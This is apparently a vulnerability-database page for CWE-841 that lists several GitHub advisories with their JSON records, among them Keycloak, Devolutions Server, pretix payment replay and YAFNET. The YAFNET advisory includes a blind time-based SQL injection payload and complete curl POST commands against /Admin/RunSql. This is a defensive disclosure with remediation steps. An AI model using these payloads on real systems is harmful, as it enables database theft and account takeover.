Common Weakness Enumeration

CWE-841

Allowed

Improper Enforcement of Behavioral Workflow

Abstraction: Class · Status: Incomplete

The product supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence.

87 vulnerabilities reference this CWE, most recent first.

GHSA-VHVQ-JH34-3FC8

Vulnerability from github – Published: 2023-01-13 06:30 – Updated: 2023-07-18 18:16
VLAI
Summary
Duplicate Advisory: Keycloak allows impersonation and lockout due to email trust not being handled correctly
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-c7xw-p58w-h6fj. This link is maintained to preserve external references.

Original Description

A flaw was found in Keycloak. This flaw allows impersonation and lockout due to the email trust not being handled correctly in Keycloak. An attacker can shadow other users with the same email and lockout or impersonate them.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.keycloak:keycloak-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "20.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-841"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-01-13T21:29:30Z",
    "nvd_published_at": "2023-01-13T06:15:00Z",
    "severity": "MODERATE"
  },
  "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-c7xw-p58w-h6fj. This link is maintained to preserve external references. \n\n## Original Description\nA flaw was found in Keycloak. This flaw allows impersonation and lockout due to the email trust not being handled correctly in Keycloak. An attacker can shadow other users with the same email and lockout or impersonate them.",
  "id": "GHSA-vhvq-jh34-3fc8",
  "modified": "2023-07-18T18:16:45Z",
  "published": "2023-01-13T06:30:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0105"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2023-0105"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2158910"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keycloak/keycloak"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Duplicate Advisory: Keycloak allows impersonation and lockout due to email trust not being handled correctly",
  "withdrawn": "2023-07-18T18:08:56Z"
}

GHSA-VP8V-33P7-8977

Vulnerability from github – Published: 2026-05-26 13:30 – Updated: 2026-05-26 13:30
VLAI
Details

Improper enforcement of the sealed-entry workflow in the entry sensitive-data retrieval feature in Devolutions Server allows an authenticated user with access to a sealed entry to retrieve its sensitive data without triggering the unseal audit notification via a crafted API request.

This issue affects :

  • Devolutions Server 2026.1.6.0 through 2026.1.16.0
  • Devolutions Server 2025.3.20.0 and earlier
Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-8477"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-841"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-22T16:16:22Z",
    "severity": "LOW"
  },
  "details": "Improper enforcement of the sealed-entry workflow in the entry sensitive-data retrieval feature in Devolutions Server allows an authenticated user with access to a sealed entry to retrieve its sensitive data without triggering the unseal audit notification via a crafted API request.\n\nThis issue affects :\n\n  *  Devolutions Server 2026.1.6.0 through 2026.1.16.0\n  *  Devolutions Server 2025.3.20.0 and earlier",
  "id": "GHSA-vp8v-33p7-8977",
  "modified": "2026-05-26T13:30:18Z",
  "published": "2026-05-26T13:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8477"
    },
    {
      "type": "WEB",
      "url": "https://devolutions.net/security/advisories/DEVO-2026-0013"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X2GQ-QH4V-9777

Vulnerability from github – Published: 2026-06-25 15:32 – Updated: 2026-06-25 15:32
VLAI
Details

Our payment integration with Mollie did not properly validate payment status responses. An attacker could use a successful payment status response from one payment and supply it to the system for a different payment, gaining access to multiple valid tickets with only one payment.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-57536"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-841"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-25T15:16:42Z",
    "severity": "MODERATE"
  },
  "details": "Our payment integration with Mollie did not properly validate payment \nstatus responses. An attacker could use a successful payment status \nresponse from one payment and supply it to the system for a different \npayment, gaining access to multiple valid tickets with only one payment.",
  "id": "GHSA-x2gq-qh4v-9777",
  "modified": "2026-06-25T15:32:02Z",
  "published": "2026-06-25T15:32:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57536"
    },
    {
      "type": "WEB",
      "url": "https://pretix.eu/about/en/blog/20260625-release-2026-5-2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-X3RQ-R3CM-5VC4

Vulnerability from github – Published: 2022-02-09 00:00 – Updated: 2023-08-25 22:06
VLAI
Summary
Publify Business Logic Errors
Details

Publify (formerly known as Typo) prior to version 9.2.7 is vulnerable to business logic errors.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "publify_core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "9.2.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-0524"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-841"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-02-09T18:33:00Z",
    "nvd_published_at": "2022-02-08T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "Publify (formerly known as Typo) prior to version 9.2.7 is vulnerable to business logic errors.",
  "id": "GHSA-x3rq-r3cm-5vc4",
  "modified": "2023-08-25T22:06:38Z",
  "published": "2022-02-09T00:00:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0524"
    },
    {
      "type": "WEB",
      "url": "https://github.com/publify/publify/pull/1044"
    },
    {
      "type": "WEB",
      "url": "https://github.com/publify/publify/commit/16fceecadbe80ab0ef846b62a12dc7bfff10b8c5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/publify/publify"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/publify_core/CVE-2022-0524.yml"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/bfffae58-b3cd-4e0e-b1f2-3db387a22c3d"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Publify Business Logic Errors"
}

GHSA-X48C-P6XP-X2XG

Vulnerability from github – Published: 2026-06-25 15:32 – Updated: 2026-06-25 15:32
VLAI
Details

Our payment integration with Oppwa-based payment methods did not properly validate payment status responses. An attacker could use a successful payment status response from one payment and supply it to the system for a different payment, gaining access to multiple valid tickets with only one payment.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-13222"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-841"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-25T15:16:34Z",
    "severity": "MODERATE"
  },
  "details": "Our payment integration with Oppwa-based payment methods did not \nproperly validate payment status responses. An attacker could use a \nsuccessful payment status response from one payment and supply it to the\n system for a different payment, gaining access to multiple valid \ntickets with only one payment.",
  "id": "GHSA-x48c-p6xp-x2xg",
  "modified": "2026-06-25T15:32:02Z",
  "published": "2026-06-25T15:32:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13222"
    },
    {
      "type": "WEB",
      "url": "https://pretix.eu/about/en/blog/20260625-release-2026-5-2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XHW7-J96H-C3G5

Vulnerability from github – Published: 2026-05-05 20:32 – Updated: 2026-05-13 16:24
VLAI
Summary
YAFNET: Pre-Handler Authorization Bypass on Admin Pages Enables Blind SQL Execution via `/Admin/RunSql`
Details

Issue Details: YAFNET's only admin authorization gate is PageSecurityCheckAttribute, implemented as a ResultFilterAttribute that runs after the page handler completes rather than before it. No other gate exists. Any admin OnPost… handler therefore executes its side effects before the filter rewrites the response to a 302 to /Info/4. The most impactful abuse is /Admin/RunSql, whose OnPostRunQuery binds Editor from the POST body and passes it straight to IDbAccess.RunSql with no caller check, yielding arbitrary SQL execution for any low-privileged user.

A deterministic boolean-conditional time oracle was confirmed end-to-end by extracting the first character of @@VERSION: IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 77) WAITFOR DELAY '0:0:5' produced a ~5-second delay (confirming the byte is M), while IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 76) WAITFOR DELAY '0:0:5' returned immediately.

Impact: An attacker holding the lowest-privileged authenticated role, effectively an anonymous attacker on any deployment that permits self-registration, gains arbitrary blind SQL execution against the application's database, with full INSERT/UPDATE/DELETE access to every table including the Identity store (AspNetUsers, yaf_User, yaf_UserRole). This yields full loss of Confidentiality (any column extractable via the time oracle), full loss of Integrity (blind writes to identity, posts, and forum configuration, including self-promotion to HostAdmin), and full loss of Availability (DELETE/DROP/WAITFOR-driven DoS). The impact escalates out of the application's trust domain: if the underlying SQL Server instance has xp_cmdshell or CLR integration enabled (common in development and test builds), the same primitive yields OS-level command execution on the database host. Because the bypass is class-wide, every other admin handler is also callable, multiplying the blast radius across user management, XML imports, and file-writing configuration pages.

Likelihood: Exploitation requires only a registered forum account (self-registration available on most deployments) and a single HTTP POST request. The attack is fully automatable in one request per probe and produces a deterministic time-based oracle with no error handling required, making the overall likelihood very high.

Steps to Reproduce: - Register or log in to the forum as any low-privileged user. - Acquire the standard __RequestVerificationToken token from any rendered page and the cookies. - Use the following CURL command: Payload: IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 77) WAITFOR DELAY '0:0:5' (77 is the character M) URL Encoded Payload: %49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%37%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27

curl.exe --path-as-is -i -s -k -X POST `
  -H 'Host: yetanotherforum.internal:8080' `
  -H 'User-Agent: curl/8.18.0' `
  -H 'Accept: */*' `
  -H 'Content-Type: application/x-www-form-urlencoded' `
  -H 'Content-Length: 428' `
  -H 'Connection: keep-alive' `
  -b '<Replace with Cookies>' `
  --data-binary 'Editor=%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%37%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27&__RequestVerificationToken=<Replace with Token>' `
  -w '\n----\nDNS:        %{time_namelookup}s\nConnect:    %{time_connect}s\nTTFB:       %{time_starttransfer}s\nTotal time: %{time_total}s\nHTTP code:  %{http_code}\n' `
  'http://yetanotherforum.internal:8080/Admin/RunSql?handler=RunQuery'

image

Payload: IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 76) WAITFOR DELAY '0:0:5' (76 is the character L) URL Encoded Payload: %49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%36%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27

curl.exe --path-as-is -i -s -k -X POST `
  -H 'Host: yetanotherforum.internal:8080' `
  -H 'User-Agent: curl/8.18.0' `
  -H 'Accept: */*' `
  -H 'Content-Type: application/x-www-form-urlencoded' `
  -H 'Content-Length: 428' `
  -H 'Connection: keep-alive' `
  -b '<Replace with Cookies>' `
  --data-binary 'Editor=%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%36%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27&__RequestVerificationToken=<Replace with Token>' `
  -w '\n----\nDNS:        %{time_namelookup}s\nConnect:    %{time_connect}s\nTTFB:       %{time_starttransfer}s\nTotal time: %{time_total}s\nHTTP code:  %{http_code}\n' `
  'http://yetanotherforum.internal:8080/Admin/RunSql?handler=RunQuery'

image

Observe that when the condition is true the response time increases, if false, it remains unchanged which confirms the presence of SQL Injection.

Remediation: - Convert PageSecurityCheckAttribute from a ResultFilterAttribute to an IAsyncPageFilter so the admin check runs in OnPageHandlerExecutionAsync and short-circuits with AccessDenied() before any handler side effects occur. - Layer an ASP.NET Core authorization policy as defense-in-depth: AddAuthorization(... AddPolicy("YafAdmin", ...)) combined with AuthorizeFolder("/Admin", "YafAdmin") in the Razor Pages conventions. - Restrict /Admin/RunSql to HostAdmin only and wrap IDbAccess.RunSql in a statement-type allow-list that rejects non-read-only SQL, even for legitimate admins. - Audit and fix any other authorization logic implemented in ResultFilterAttribute / OnResultExecuting(Async), they share the same lifecycle bug. - Add regression tests that invoke each admin OnPost… handler as a non-admin and assert no database or filesystem side effects occur.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.0.4"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "YAFNET.Core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43937"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-841",
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T20:32:27Z",
    "nvd_published_at": "2026-05-12T15:16:15Z",
    "severity": "HIGH"
  },
  "details": "**Issue Details:**\nYAFNET\u0027s only admin authorization gate is `PageSecurityCheckAttribute`, implemented as a `ResultFilterAttribute` that runs *after* the page handler completes rather than before it. No other gate exists. Any admin `OnPost\u2026` handler therefore executes its side effects before the filter rewrites the response to a `302` to `/Info/4`. The most impactful abuse is `/Admin/RunSql`, whose `OnPostRunQuery` binds `Editor` from the POST body and passes it straight to `IDbAccess.RunSql` with no caller check, yielding arbitrary SQL execution for any low-privileged user.\n\nA deterministic boolean-conditional time oracle was confirmed end-to-end by extracting the first character of `@@VERSION`: `IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 77) WAITFOR DELAY \u00270:0:5\u0027` produced a ~5-second delay (confirming the byte is `M`), while `IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 76) WAITFOR DELAY \u00270:0:5\u0027` returned immediately.\n\n\n**Impact:**\nAn attacker holding the lowest-privileged authenticated role, effectively an anonymous attacker on any deployment that permits self-registration, gains arbitrary blind SQL execution against the application\u0027s database, with full `INSERT`/`UPDATE`/`DELETE` access to every table including the Identity store (`AspNetUsers`, `yaf_User`, `yaf_UserRole`). This yields full loss of Confidentiality (any column extractable via the time oracle), full loss of Integrity (blind writes to identity, posts, and forum configuration, including self-promotion to HostAdmin), and full loss of Availability (`DELETE`/`DROP`/`WAITFOR`-driven DoS). The impact escalates out of the application\u0027s trust domain: if the underlying SQL Server instance has `xp_cmdshell` or CLR integration enabled (common in development and test builds), the same primitive yields OS-level command execution on the database host. Because the bypass is class-wide, every other admin handler is also callable, multiplying the blast radius across user management, XML imports, and file-writing configuration pages.\n\n**Likelihood:**\nExploitation requires only a registered forum account (self-registration available on most deployments) and a single HTTP POST request. The attack is fully automatable in one request per probe and produces a deterministic time-based oracle with no error handling required, making the overall likelihood very high.\n\n**Steps to Reproduce:**\n- Register or log in to the forum as any low-privileged user.\n- Acquire the standard `__RequestVerificationToken` token from any rendered page and the cookies. \n- Use the following CURL command:\nPayload: ```IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 77) WAITFOR DELAY \u00270:0:5\u0027``` (77 is the character **M**)\nURL Encoded Payload: ```%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%37%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27```\n\n```\ncurl.exe --path-as-is -i -s -k -X POST `\n  -H \u0027Host: yetanotherforum.internal:8080\u0027 `\n  -H \u0027User-Agent: curl/8.18.0\u0027 `\n  -H \u0027Accept: */*\u0027 `\n  -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 `\n  -H \u0027Content-Length: 428\u0027 `\n  -H \u0027Connection: keep-alive\u0027 `\n  -b \u0027\u003cReplace with Cookies\u003e\u0027 `\n  --data-binary \u0027Editor=%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%37%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27\u0026__RequestVerificationToken=\u003cReplace with Token\u003e\u0027 `\n  -w \u0027\\n----\\nDNS:        %{time_namelookup}s\\nConnect:    %{time_connect}s\\nTTFB:       %{time_starttransfer}s\\nTotal time: %{time_total}s\\nHTTP code:  %{http_code}\\n\u0027 `\n  \u0027http://yetanotherforum.internal:8080/Admin/RunSql?handler=RunQuery\u0027\n```\n\u003cimg width=\"1619\" height=\"921\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1c5d4d96-a69a-47eb-9558-e5fe1e6cc9e4\" /\u003e\n\nPayload: ```IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 76) WAITFOR DELAY \u00270:0:5\u0027``` (76 is the character **L**)\nURL Encoded Payload: ```%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%36%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27```\n\n```\ncurl.exe --path-as-is -i -s -k -X POST `\n  -H \u0027Host: yetanotherforum.internal:8080\u0027 `\n  -H \u0027User-Agent: curl/8.18.0\u0027 `\n  -H \u0027Accept: */*\u0027 `\n  -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 `\n  -H \u0027Content-Length: 428\u0027 `\n  -H \u0027Connection: keep-alive\u0027 `\n  -b \u0027\u003cReplace with Cookies\u003e\u0027 `\n  --data-binary \u0027Editor=%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%36%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27\u0026__RequestVerificationToken=\u003cReplace with Token\u003e\u0027 `\n  -w \u0027\\n----\\nDNS:        %{time_namelookup}s\\nConnect:    %{time_connect}s\\nTTFB:       %{time_starttransfer}s\\nTotal time: %{time_total}s\\nHTTP code:  %{http_code}\\n\u0027 `\n  \u0027http://yetanotherforum.internal:8080/Admin/RunSql?handler=RunQuery\u0027\n```\n\n\u003cimg width=\"1616\" height=\"928\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e499da2e-d4d1-41cd-a5da-e709bf60f817\" /\u003e\n\nObserve that when the condition is true the response time increases, if false, it remains unchanged which confirms the presence of SQL Injection.\n\n**Remediation:**\n- Convert `PageSecurityCheckAttribute` from a `ResultFilterAttribute` to an `IAsyncPageFilter` so the admin check runs in `OnPageHandlerExecutionAsync` and short-circuits with `AccessDenied()` before any handler side effects occur.\n- Layer an ASP.NET Core authorization policy as defense-in-depth: `AddAuthorization(... AddPolicy(\"YafAdmin\", ...))` combined with `AuthorizeFolder(\"/Admin\", \"YafAdmin\")` in the Razor Pages conventions.\n- Restrict `/Admin/RunSql` to `HostAdmin` only and wrap `IDbAccess.RunSql` in a statement-type allow-list that rejects non-read-only SQL, even for legitimate admins.\n- Audit and fix any other authorization logic implemented in `ResultFilterAttribute` / `OnResultExecuting(Async)`, they share the same lifecycle bug.\n- Add regression tests that invoke each admin `OnPost\u2026` handler as a non-admin and assert no database or filesystem side effects occur.",
  "id": "GHSA-xhw7-j96h-c3g5",
  "modified": "2026-05-13T16:24:24Z",
  "published": "2026-05-05T20:32:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/YAFNET/YAFNET/security/advisories/GHSA-xhw7-j96h-c3g5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43937"
    },
    {
      "type": "WEB",
      "url": "https://github.com/YAFNET/YAFNET/commit/27f7e671f93698f7e014d5d0fb88320248b8aa20"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/YAFNET/YAFNET"
    },
    {
      "type": "WEB",
      "url": "https://github.com/YAFNET/YAFNET/releases/tag/v4.0.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "YAFNET: Pre-Handler Authorization Bypass on Admin Pages Enables Blind SQL Execution via `/Admin/RunSql`"
}

GHSA-XX8C-V55P-48RC

Vulnerability from github – Published: 2022-06-25 00:00 – Updated: 2022-07-07 00:00
VLAI
Details

Controls limiting uploads to certain file extensions may be bypassed. This could allow an attacker to intercept the initial file upload page response and modify the associated code. This modified code can be forwarded and used by a script loaded later in the sequence, allowing for arbitrary file upload into a location where PHP scripts may be executed.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-2102"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-434",
      "CWE-841"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-24T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "Controls limiting uploads to certain file extensions may be bypassed. This could allow an attacker to intercept the initial file upload page response and modify the associated code. This modified code can be forwarded and used by a script loaded later in the sequence, allowing for arbitrary file upload into a location where PHP scripts may be executed.",
  "id": "GHSA-xx8c-v55p-48rc",
  "modified": "2022-07-07T00:00:27Z",
  "published": "2022-06-25T00:00:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2102"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.